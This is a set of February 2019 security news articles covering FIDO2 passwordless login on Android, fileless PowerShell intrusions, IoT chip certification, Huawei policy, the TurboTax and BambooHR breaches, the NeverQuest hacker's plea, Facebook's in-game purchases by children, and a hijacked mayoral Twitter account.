STE WILLIAMS

The passwordless web came a billion devices closer to reality on Monday when the Fast IDentity Online (FIDO) alliance announced an update to Google Play Services that brings FIDO2 certification to roughly half of all Android devices available today.

Specifically, the alliance said that any compatible device running Android 7.0+ is now FIDO2 certified out of the box or after an automated Google Play Services update.

This will allow users to log in to websites and apps that support the FIDO2 protocols by using their devices’ biometric readers – such as fingerprint or facial recognition. Alternatively, they can log in with other forms of authentication that are compatible with the FIDO2 specification, such as YubiKeys or Titans, which are Google’s own Bluetooth-based version of Yubico’s hardware-based security key.

Releasing the FIDO2 update through the automated Google Play Services feature means that it should be a pretty frictionless security boost. Manufacturers don’t have to adapt their devices or, really, do anything. That should make the security upgrade easier to get users to adopt, in contrast to two-factor authentication (2FA).

Although FIDO2 support will allow Android to accept secure web logins using Yubikey and Titan, NFC, and Bluetooth, Google anticipates that fingerprint authentication will be the easiest way, and the one that’s likely to become users’ preferred method.

Google Product Manager Christiaan Brand said that FIDO2 offers protection against phishing attacks, while the FIDO Alliance said that it also protects against man-in-the-middle attacks and those that use stolen credentials.

That’s because biometrics such as fingerprint data – in the form of a cryptographic signature – are always stored locally on the device, without ever being sent anywhere else or being held by any other party.

Wired quoted Kenn White, director of the Open Crypto Audit Project:

Providing the FIDO2 option gives really strong identity protection for account holders. You and I might be fooled by ‘paypa1.com,’ but a FIDO key won’t be. Among the security community, WebAuthn, which FIDO2 intersects with, is considered one of the strongest account protections there is.

WebAuthn is a recently minted set of rules, an API (Application Programming Interface), that websites and web browsers can use to enable authentication using public key cryptography instead of passwords. It’s one of two keystone technologies required for passwordless web authentication, the other being CTAP.

The death of passwords (hopefully!) draws nigh

Android joins what appears to be a march towards a passwordless web that’s picking up the pace. In November, Microsoft announced that its 800 million account holders would be able to log in to services like Outlook, Office, Skype and Xbox Live without using a password.

Before that, we saw Mozilla Firefox, Google Chrome and Microsoft Edge roll out support for WebAuthn.

For devs

For a deep dive into the passwordless web and what developers need to do to get us there, check out our writeup.

Specifically for this new FIDO2-ification of Android, the FIDO Alliance has these resources for developers.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/qT1gVUlM1Kw/

A company’s internal network, once compromised, is now more likely to be ransacked by automated scripts than a piece of malware.

This according to researchers with IBM’s X-Force, who found that in 2018 just 43 per cent of the attacks it analyzed utilized any sort of locally installed files. Rather, the hackers utilized PowerShell scripts to execute their dirty deeds in memory without significantly touching file systems, if at all.

This finding is important because it is another reminder that admins can no longer solely rely on specific file signatures or similar as evidence of a cyber-intrusion. As with local malware infections, the attacker first needs to get the ability to run malicious commands. What differs is the next step, as the miscreant does not direct the infected machine to download, save, and execute a trojan payload.

Rather, the attack runs entirely as commands from PowerShell, where the powerful scripting language can be used to do anything from harvest and steal passwords to mine cryptocurrency.

“PowerShell is useful in data collection and analysis, but it is also favored by malicious actors who use it to forego the file system and inject malicious code directly into memory, thus enhancing obfuscation, and often evading security controls designed to detect malware deployments,” the IBM report reads.

Windows 10 security question: How do miscreants use these for post-hack persistence?

READ MORE

“Threat actors of all skill levels have expanded their capabilities using PowerShell over the last few years. IBM X-Force IRIS has seen cases wherein complete malicious toolkits were contained within PowerShell scripts.”

In some cases, crooks wouldn’t even need to run a super-leet exploit to steal corporate data. The X-Force report notes that misconfiguration incidents – instances where databases and storage buckets were left exposed to the public-facing internet – were also up 20 per cent from last year and accounted for 43 per cent of all of the exposed records X-Force tracked last year.

In addition to the exposed files and records themselves, misconfigurations could also indirectly lead to other attacks when things like passwords and email addresses are involved and used to login to other accounts on other services to carry out further mischief.

Finally, the report found, the tried and true social engineering attack remains as effective as it has ever been.

Last year, IBM found that 29 per cent of the attacks it analyzed were phishing attacks, and 45 per cent of those were targeted attacks on specific employees, something X-Force terms the business email compromise.

“When it comes to the most lucrative types of social engineering scams, BEC has been a growing tide for several years spanning all industries and geographies,” notes X-Force.

It seems that, despite the various methods for sophisticated attacks, a bogus “CEO” email demanding a wire transfer is still a foolproof way to con a company out of cash. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/02/26/malware_ibm_powershell/

A three-tier certification regimen shows adherence to the Platform Security Architecture.

Arm, which designs processors used in devices from smart doorbells to supercomputers, is partnering with five laboratories and consulting firms to develop a certification for adherence to the Platform Security Architecture (PSA). The PSA is a framework and set of resources designed to help improve the security of Internet of Things (IoT) devices starting with the processing chips themselves.

PSA Certified offers three levels of certification in an attempt to prove basic security principles have been embedded in IoT hardware.

“This will enable trust in individual devices, in their data, and in the deployment of these devices at scale in IoT services, as we drive towards a world of a trillion connected devices,” said Paul Williamson, vice president and general manager of Arm’s Emerging Businesses Group, in a statement announcing the certification.

Level 1 certification involves a questionnaire for the manufacturer seeking certification, with the precise contents of the form varying depending on whether the component is a chip, device, operating system, or something else. The questionnaire is based on the 10 security model goals of the PSA architecture and is used, along with a lab check at one of the PSA-certified lab partners, or ensure compliance.

According to Arm, a number of manufacturers have attained Level 1 certification. They include Cypress, Express Logic, Microchip, Nordic Semiconductor, Nuvoton, NXP, STMicroelectronics, and Silicon Labs. 

Levels 2 and 3 certification require lab tests against the PSA root of trust protection profile; Level 3 also includes additional tests involving side-channel attacks and other vulnerabilities. These levels are intended for CPU and chip vendors to prove that their devices can be trusted as the basis of secure systems. These tests will be provided by testing lab partners Brightsight, CAICT, Riscure, and UL, along with consultants ProveRun.

For a growing number of consumers and businesses, IoT security is a critical component of personal and financial security. In the “Avast Smart Home Security Report 2019,” released today, researchers note that more than 40% of homes worldwide — and 62% of homes in the US, have more than five connected smart devices.

“It only takes one weak device to let in a bad hacker, and once they are on the network, they can access other devices and the personal data they stream or store, including live videos and voice recordings,” said Avast president Ondrej Vlcek, commenting on the report.

Related Content:

• Mozilla, Internet Society and Others Pressure Retailers to Demand Secure IoT Products
• IoT Security’s Coming of Age Is Overdue
• Black Hat Asia Offers New IoT Security Tools Tricks
• The Coolest Hacks of 2018
• Consumers Demand Security from Smart Device Makers

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Curtis Franklin Jr. is Senior Editor at Dark Reading. In this role he focuses on product and technology coverage for the publication. In addition he works on audio and video programming for Dark Reading and contributes to activities at Interop ITX, Black Hat, INsecurity, and … View Full Bio

Article source: https://www.darkreading.com/iot/new-arm-certification-aims-to-secure-iot-devices/d/d-id/1333958?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The world must “understand the opportunities and threats from China’s technological offer”, GCHQ director Jeremy Fleming said today as he observed that there are “no clear norms or behaviours” for state-on-state cyber-squabbling.

Speaking at an International Institute for Strategic Studies event in Singapore, Fleming called for the world’s “cyber powers” to “converge on agreed definitions, on regulatory frameworks, industry standards and norms of ethical behaviour” (PDF).

Huawei hasn’t yet fixed its security vulns, says UK’s NCSC overseers

READ MORE

He also commented on Britain’s oversight of Chinese mobile network equipment company Huawei and its cybersecurity practices, saying: “Experience shows that any company in an excessively dominant market position will not be incentivised to take cybersecurity seriously. So we need a diversified market, competing on quality and security, as well as price.”

Fleming also directly challenged China, Iran, Russia and North Korea over online hacking attacks, vowing that “the UK and its allies will keep calling this out”. He highlighted the public attribution of the APT10 hacking group’s activities to China in December 2018 as one example.

The location of Fleming’s speech, Singapore, is no coincidence. Over the next few years the UK aims to step up its presence in the Far East, including a deployment of a Royal Navy task force to the South China Sea in 2021.

We’re doing it Huawei, OK?

Fleming’s remarks about China will intensify the pressure on Huawei over allegations that the Chinese state uses the company’s presence to insert covert backdoors for spying on western companies and governments. The British government has covertly acknowledged this by admitting last week that it bans Huawei equipment from its own networks, leaving the private sector and general public to take their chances.

No concrete evidence has so far emerged that Huawei equipment contains a backdoor or any other means for China to snoop on.

Meanwhile, Nick Read, chief exec of Vodafone, publicly called for America to share its evidence that Huawei mobile network equipment poses a national security threat to countries its kit is installed in.

“People are saying things at the moment that are not grounded. I’m not saying that is the case for the US because I have not met them directly myself so I have not seen what evidence they have, but they clearly need to present that evidence to the right bodies throughout Europe,” Read said at Mobile World Congress in Barcelona this morning, as quoted by Reuters.

Huawei has also gone on the PR offensive in recent weeks, with executives speaking publicly, including founder Ren Zhengfei, who gave an unusual public interview to the BBC last month. Such a move is a new one for the company, which, while not shunning the limelight, has until now not tried to take the public initiative. ®

Digital homeland?

Fleming’s speech has also riled up defenders of the internet who have noted his argument that businesses and institutions “must protect the digital homeland.”

The “digital homeland” analogy is an apparently clear sign that Fleming views the global telecommunications network as something that can or should have geographic borders: an approach that reflects the mindset of China and Russia rather than the traditional Western view of the web.

Both China and Russia have increasingly adopted the idea that they will have their “own” internet, largely as a result of what they feared was a creeping influence of outside voices into their cultures. China, in effect, operates a national intranet with carefully controlled access point to the broader global internet.

Russia has also repeatedly suggested in recent years that it will cut off its citizens’ access to the global network and build its own internal internet. But to hear a Western democracy suggest that the model of a national internet is an alarm bell to many that the voices of control in UK society – in this case, the security services – are increasingly viewing the internet as something to be controlled rather than adapted to.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/02/25/gchq_director_jeremy_fleming_china_opportunity_threat/

Equipment made by Chinese electronics giant Huawei could be torn out of America’s electrical grid, if US senators get their way.

The bipartisan Senate Intelligence Committee today recommended Uncle Sam’s Department of Energy and Department of Homeland Security move to keep Huawei hardware out of the Land of the Free’s power networks.

Specifically, the legislators said, they want both agencies to bar utilities from purchasing and installing a specific family of network-connected inverter Huawei produces for solar power grids. These inverters convert DC electricity from the panels into AC for the grid, and can be controlled remotely to manage solar arrays.

The senators reason that if Huawei can not be trusted to supply computer gear for communications systems, they should not be supplying vital electronics for new solar plants. The committee members fear Beijing will instruct Huawei to backdoor its products allowing Chinese spies to silently snoop on Western targets from afar. Huawei insists it is not compromising its kit for its Communist overlords.

“Huawei has recently become the world’s largest maker of inverters – the sophisticated control systems that have allowed the rapid expansion of residential and utility scale energy production,” the committee says in its letter (PDF) to DOE boss Rick Perry and DHS head Kirstjen Nielsen. “Both large-scale photovoltaic systems and those used by homeowners, school districts, and businesses are equally vulnerable to cyberattacks.

“Our federal government should consider a ban on the use of Huawei inverters in the United States and work with state and local regulators to raise awareness and mitigate potential threats.”

You’re on a Huawei to Hell, US Sec State Pompeo warns allies: Buy Beijing’s boxes, no more intelligence for you

READ MORE

Among the high-ranking senators signing off on the letter are Mitt Romney (R-UT), Dianne Feinstein (D-CA), Tom Cotton (R-AR), and Little Marco Rubio (R-FL). Senators Cotton and Marco had previously spearheaded successful efforts to get Huawei products barred.

Huawei already faces a blanket ban on its wireless and networking gear in US government networks, as the administration believes the Chinese will use the hardware to spy on private and public-sector organizations. The US government has since 2018 said that it would not provide federal assistance funds to any phone company that uses Huawei gear, a move that effectively bars Huawei equipment most large carriers in the nation.

At the same time, the Feds have charged Huawei chief financial officer Meng Wanzhou with illegally breaking sanctions against Iran, and are trying to extradite her from Canada to America. Wanzhou, daughter of the corporation’s founder Ren Zhengfei, and Huawei itself deny those charges, and the allegations it works with the Chinese government to spy on foreign entities. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/02/25/huawei_us_electric_grid/

Officials report an unauthorized party obtained tax return data by using credentials obtained from an outside source.

Intuit, a financial software company and creator of services Mint, QuickBooks, and TurboTax, reports the latter has been hit with a credential stuffing attack targeting users’ tax return information.

The incident was discovered during a system security review, Intuit reported in a breach disclosure letter filed with the Office of the Vermont Attorney General and shared with affected users. Officials explain how an unauthorized party targeted TurboTax users by taking usernames and passwords “from a non-Intuit source,” which they used in a credential stuffing attack.

If their login was successful, attackers may have accessed data contained in a prior year’s tax return or current tax returns in progress. This includes name, Social Security number, address(es), birthdates, driver’s license number, and financial data (salary, deductions), as well as information belonging to other individuals included in the victim’s tax return, they report.

Upon discovering the problem, Intuit made affected accounts temporarily unavailable to protect data from further unauthorized access. It’s offering victims one year of free identity protection, credit monitoring, and identity restoration services via Experian IdentityWorks.

Read more details here.

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/threat-intelligence/turbotax-hit-with-cyberattack-tax-returns-compromised/d/d-id/1333954?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

The hacker ran a botnet that spread ‘NeverQuest’ malware for three years and collected millions of banking credentials.

Stanislav Vitaliyevich Lisov, a Russian citizen accused of using the NeverQuest banking Trojan to steal login information from victims, has pled guilty to one count of conspiracy to commit computer hacking in Manhattan Federal Court. The crime carries a maximum penalty of five years in prison.

According to statements made in court, Lisov — also known as “Black,” a/k/a “Blackf” — was responsible for his part of creating and administering a botnet infected with NeverQuest between June 2012 and January 2015. He also was responsible for maintaining the infrastructure of and managing a network of servers containing lists of millions of stolen login credentials – including usernames, passwords, and security questions and answers – for victims’ accounts on banking and other financial websites.

Lisov was arrested in Spain on January 13, 2017, and on January 19, 2018 was extradited from Spain to the United States. He is scheduled for sentencing on June 27, 2019.

For more, read here.

 

 

 

Join Dark Reading LIVE for two cybersecurity summits at Interop 2019. Learn from the industry’s most knowledgeable IT security experts. Check out the Interop agenda here.

Dark Reading’s Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article. View Full Bio

Article source: https://www.darkreading.com/application-security/russian-hacker-pleads-guilty-to-bank-fraud-/d/d-id/1333956?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

In 2011, Glynnis Bohannon’s 12-year-old son handed her $20. In exchange, she let him use her credit card so he could spend $20 on “Facebook Credits” to use in the Ninja Saga game.

At least, that’s how much he, and she, thought they were spending. A year and nearly a $1,000 worth of credit card charges later – he didn’t know that virtual currency came with a real-world cost – Ms. Bohannon and another exasperated, cash-sapped parent filed a class action lawsuit against Facebook.

Facebook was ordered to refund parents when the suit was settled in 2016, but the repercussions are still rippling out after a court granted a request to unseal the legal documents, made by the Center for Investigative Reporting (CIR).

On Thursday, more than a dozen groups that advocate for children’s rights said they’re asking the Federal Trade Commission (FTC) to investigate whether Facebook has engaged in illegal, unfair or deceptive practices by enticing children to spend money on in-game purchases without their parents’ consent.

After looking over 135 pages of documents unsealed last month, the CIR says that internal Facebook memos, “secret strategies” and employee emails paint what it calls a “troubling picture” of how Facebook conducted business between 2010 and 2014.

The judge allowed Facebook to keep some documents sealed. What’s come into the light of day paints an extremely unflattering portrait of the company, and that’s saying a lot for Facebook.

Some of the unsavory practices of monetizing kids that are revealed in the documents:

“Friendly fraud”

One memo sought to explain “friendly fraud” (FF) – Facebook’s term for children spending money on games without parental permission – to explain “what it is, why it’s challenging, and why you shouldn’t try to block it.”

• Facebook encouraged game developers that FF was a positive when it came to maximizing revenues, according to an email titled “developer education for loss insights” that outlines the company’s game strategy.
• Another internal document refers to situations in games where children didn’t even know they were spending money. Facebook knew all about this, the CIR says:
  

  Their own reports showed underage users did not realize their parents’ credit cards were connected to their Facebook accounts and they were spending real money in the games, according to the unsealed documents.

  In fact, in that report, it’s suggested that maybe Facebook should just refund parents. Facebook chose to ignore such warnings from its own employees for years. Instead, it told game developers that it was focused on maximizing revenues.

• Another document is a transcript of a discussion between Facebook employees after parents found out how much their kids had spent. In one case, a 15-year-old racked up $6,545 during two weeks of gameplay on Facebook. Facebook employees call such children “whales” – a term used in the casino industry to describe profligate spenders. Such children could blithely rack up big bills by purchasing in-game features such as crop-unwilt in FarmVille, for example, or magic spells, or flaming swords, or any of the other features that help game players. In the conversation about the $6,545 credit card bill that resulted from such naivety, the Facebook employees recommend not refunding the parent.

Parents who couldn’t get a response from Facebook, be it from emailing or phone messages, were forced to turn to the Better Business Bureau, or their credit card companies, to get their money back, according to the CIR.

Facebook made a clear decision

The CIR said that the revenue that Facebook made from “bamboozling” children had such large chargeback rates – that’s when credit card companies had to claw back money on behalf of parents – that it far exceeded what the FTC judges to be a red flag for deceptive business practices. All of this went on for years, the CIR said:

Despite the many warning signs, which continued for years, Facebook made a clear decision. It pursued a goal of increasing its revenues at the expense of children and their parents.

Facebook employees not only knew about the problem of FF; they also came up with a solution… that was ignored. To reduce credit card company chargebacks, Facebook employee Tara Stewart suggested to colleagues that the company should just refund money to parents when their kids clearly used their credit card without permission.

A few months earlier, she’d launched a test project to help Facebook reduce chargebacks by requiring children to re-enter the first six digits of the credit card number on certain games before they could spend money. It worked, according to internal documents: It lowered the number of refund and chargeback requests from children.

It had one problem, though: it would have denied Facebook a sizeable chunk of revenue.

In response to a report that found that Angry Birds had a sky-high refund rate of 5-10% (a 2% chargeback rate being what the FTC calls a “red flag” about a “deceptive” business), one Facebook employee wrote:

If we were to build risk models to reduce it, we would most likely block good TPV [total purchase value].

…In other words, revenue.

They ALL squeeze kids like they were so many juicy lemons

Facebook isn’t the only tech company to profit off of game-playing kids. Apple, Google and Amazon have all been accused of squeezing profit out of kids by making it too easy for them to spend money in apps.

All three have also reached settlements with the FTC that required the companies to pay tens of millions in refunds and forced them to modify their billing practices to ensure express consent from parents for in-app purchases.

Facebook’s response

This is what Facebook had to say when the CIR asked for an interview:

We were contacted by the Center for Investigative Reporting last year, and we voluntarily unsealed documents related to a 2012 case about our refund policies for in-app purchases that parents believe were made in error by their minor children.

We intend to release additional documents as instructed by the court. Facebook works with parents and experts to offer tools for families navigating Facebook and the web. As part of that work, we routinely examine our own practices, and in 2016 agreed to update our terms and provide dedicated resources for refund requests related to purchased made by minors on Facebook.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/-4Iewiyjz5k/

Officials in Tampa, Florida, were scrabbling to regain control of the mayor’s Twitter account this week after a hacker hijacked it to post bomb threats and child sex abuse images. The attacker, who took over the account just two weeks before the city’s municipal elections, tried to implicate others in the hijacking.

Mayor Bob Buckhorn’s account is normally filled with pro-Tampa messages. He encourages developers to submit innovative ideas for urban expansion and promotes owner-occupied home repair programs. Early on Thursday morning, however, things went sideways. The mayor’s account was hacked to post messages, most of which were too vile to reproduce here.

The imposter’s tweets included racist and sexist tweets, images of pornography, and child sex abuse images tagging personalities in the gaming community. There was also this tweet:

In another tweet, the hacker reportedly tweeted Tampa airport with this message:

I have hidden a bomb in a package somewhere…Looking forward to seeing some minorities die.

Tampa City Hall was quick to correct the record, with communications director Ashley Bauman issuing the following statement:

Earlier this morning we noticed someone hacked Mayor Buckhorn’s twitter account, this was clearly not Mayor Buckhorn. Upon noticing the hack we immediately began investigating these reprehensible tweets.

We will work with our Tampa Police Department as well as all investigators to figure out how this breach was made. We urge residents to change their passwords and continue to alert officials when they see an unlikely change in account activity. We are working with law enforcement to investigate all threats made by this hack.

However, City Hall still spent five hours wresting control of the account back from the hacker. After working with Twitter, it finally gained access at 9am Eastern time on Thursday, at which point it was able to delete the offending tweets.

The first illegitimate tweet on Buckhorn’s account attributed the hack to three separate people on Twitter, at least two of whom operate online gaming servers. At least one of the three people denied the claim outright:

A verified account was hacked and they tweeted that I hacked it, fyi it was not me, and the same people who hacked… twitter.com/i/web/status/1…

—
Colby (@MeeZoid) February 21, 2019

The attacker also changed the account for a while to make it seem as though Salem, Oregon, resident Gunner Levy was responsible. Levy has been the victim of other impersonation attacks, including SWATting, before. Someone alerted police that he was going to attack a local school, he told reporters, adding:

This is all just over arguing online.

Most people seem to realise that the attack was a hack pretty quickly, thanks to the egregious nature of the tweets. What would be more worrying is if someone began issuing threats that looked credible.

How did the attacker get in? Experts rolled out the usual weaknesses, including poor passwords.

With that in mind, the use of passphrases or strong passwords with random characters, and the avoidance of words found in the dictionary, are all useful approaches to help protect your Twitter password. Better still is the use of 2FA, which Twitter supports.

The Tampa elections will be held on 5 March, but early voting begins today.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/vERzdqt6_VU/

Roundup Last week, the security world saw Adobe take a do-over, Cisco clean up some bugs and the NCC head out to space.

Let’s kick off the week with some other happenings in the world of infosec.

Bamboo spills beans on hack attack

Cloud-based human-resources biz BambooHR has admitted that some companies using its Trax online payroll service were hacked, and sensitive private data, primarily names and full US social security numbers of employees, was exposed to miscreants. The software-as-a-service outfit told El Reg on Friday it was working with law enforcement to figure out what happened.

“The information of a handful of our Trax customers was compromised this past week, and we secured the information for these affected customers very quickly,” a Bamboo spokesperson said. “We are in contact with their legal teams, insurance companies, and the FBI to make sure our customers are safe and secure.”

One thing to note here: when Bamboo says “a handful” of customers were exposed, it’s not referring to the number of people, but rather companies that use the service. Those “customers” can in fact be businesses that manage the data of hundreds or thousands of individual employees. So even if only a few accounts were accessed we could still see a significant number of people exposed.

Also, Bamboo is being weirdly cagey about the details: it’s not clear if companies were hacked by poorly securing their Trax accounts, such as using weak passwords, or if the Trax backend itself was compromised, and only some customer records were taken before the intrusion was caught and stopped. Bamboo declined to confirm either way.

Wendy’s tosses $50m on the grill to settle breach case

Fast food chain Wendy’s says it has agreed to pay $50m to settle the class-action suit filed on behalf of customers whose card details were slurped in 2015 and 2016 when a malware infection was spreading through its cash registers.

“With this settlement, we have now reached agreements in principle to resolve all of the outstanding legal matters related to these criminal cyberattacks,” CEO Todd Penegor said of the deal.

“We look forward to putting this behind us so that we can continue to focus on growing the Wendy’s brand.”

While insurance will help to cover some of the settlement cash, Wendy’s says it will still have to shell out around $27.5m of its own money to cover the remainder of the payout.

The cash will go to the banks and financial institutions who had to deal with the stolen cards, and as always the lawyers who brought the case will also be able to collect a healthy payout from the $50m pile of cash.

NeverQuest hacker pleads guilty

A Russian man has admitted to using a banking trojan called NeverQuest to take millions of dollars from Americans.

Stanislav Lisov plead guilty to a single count of conspiracy to commit computer hacking and now faces five years behind bars.

Lisov, who was arrested in Spain in 2017 and extradited to the US a year later, admitted to infecting PCs with Neverquest and using the resulting botnet to mass-harvest bank account credentials.

According to the DOJ, at its peak the botnet was harvesting “millions” of accounts for Lisov to access and drain.

How much is your Facebook account worth? A lousy £3

Your Facebook account won’t net the typical hacker even enough to purchase a decent cup of java.

This according to a report from MoneyGuru, which found that the going rate for a stolen account on the social network was a mere £3. By comparison, an AppleID account would fetch around £10.30 and Netflix credentials go for £8.20.

Even Instagram accounts were deemed more valuable than Facebook, with individual credentials going for £4.80 on average.

“There are few better ways to gain insight into someone’s life than their social media accounts,” says MoneyGuru.

“These details are frequently stolen to sell to companies with little scruples about targeted advertising. It’s also a fast track to identity theft as they can take control of your accounts, lock you out and cause serious reputational damage in a short space of time.”

Crikey! Aussie hospital gets 15,000 records ransomed

An Australian hospital says some 15,000 of its patient records are being held for ransom by hackers.

The Age says that Cabrini hospital in Malvern was hit by what it calls a “digital crime syndicate”, (which seems like an odd way to describe a ransomware infection) and, despite caving in and paying up the demanded cryptocurrency, it still hasn’t been able to get back all of the encrypted records.

This is where we point out that paying ransomware demands is not a good idea. Even when you comply, you’re more likely than not to still lose your data. Instead, make regular backups and be prepared to wipe and restore your devices if need be.

Microsofties rebel over military HoloLens project

A bit of unrest is brewing in Redmond over a controversial project Microsoft is planning with the US government.

A group called Microsoft Workers for Good is flogging an open letter to CEO Satya Nadella, and president Brad Smith asking that they reconsider a project called “IVAS” which uses the HoloLens technology to train soldiers in combat situations. In this case, the group argues, HoloLens is being used to make the soldiers more capable of killing, something they object to.

“We did not sign up to develop weapons,” the group declares, “and we demand a say in how our work is used.”

Hackers flogging Pakistani bank accounts

Researchers with Russian security firm Group-IB say they have spotted a massive cache of bank accounts from Pakistan being flogged on darknet markets.

The databases are said to be valued at around $3.5m in all and include more than 69,000 cards with PINs. The accounts are priced at $50 each, and nearly all appear to originate from one bank, Meezan.

“The scale, volume, frequency and connection to one institution contributes to the theory that the leak might be involved in a larger incident, potentially an advanced actor gaining access to card systems within Pakistan,” said researcher Dmitry Shestakov. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/02/25/infosec_roundup/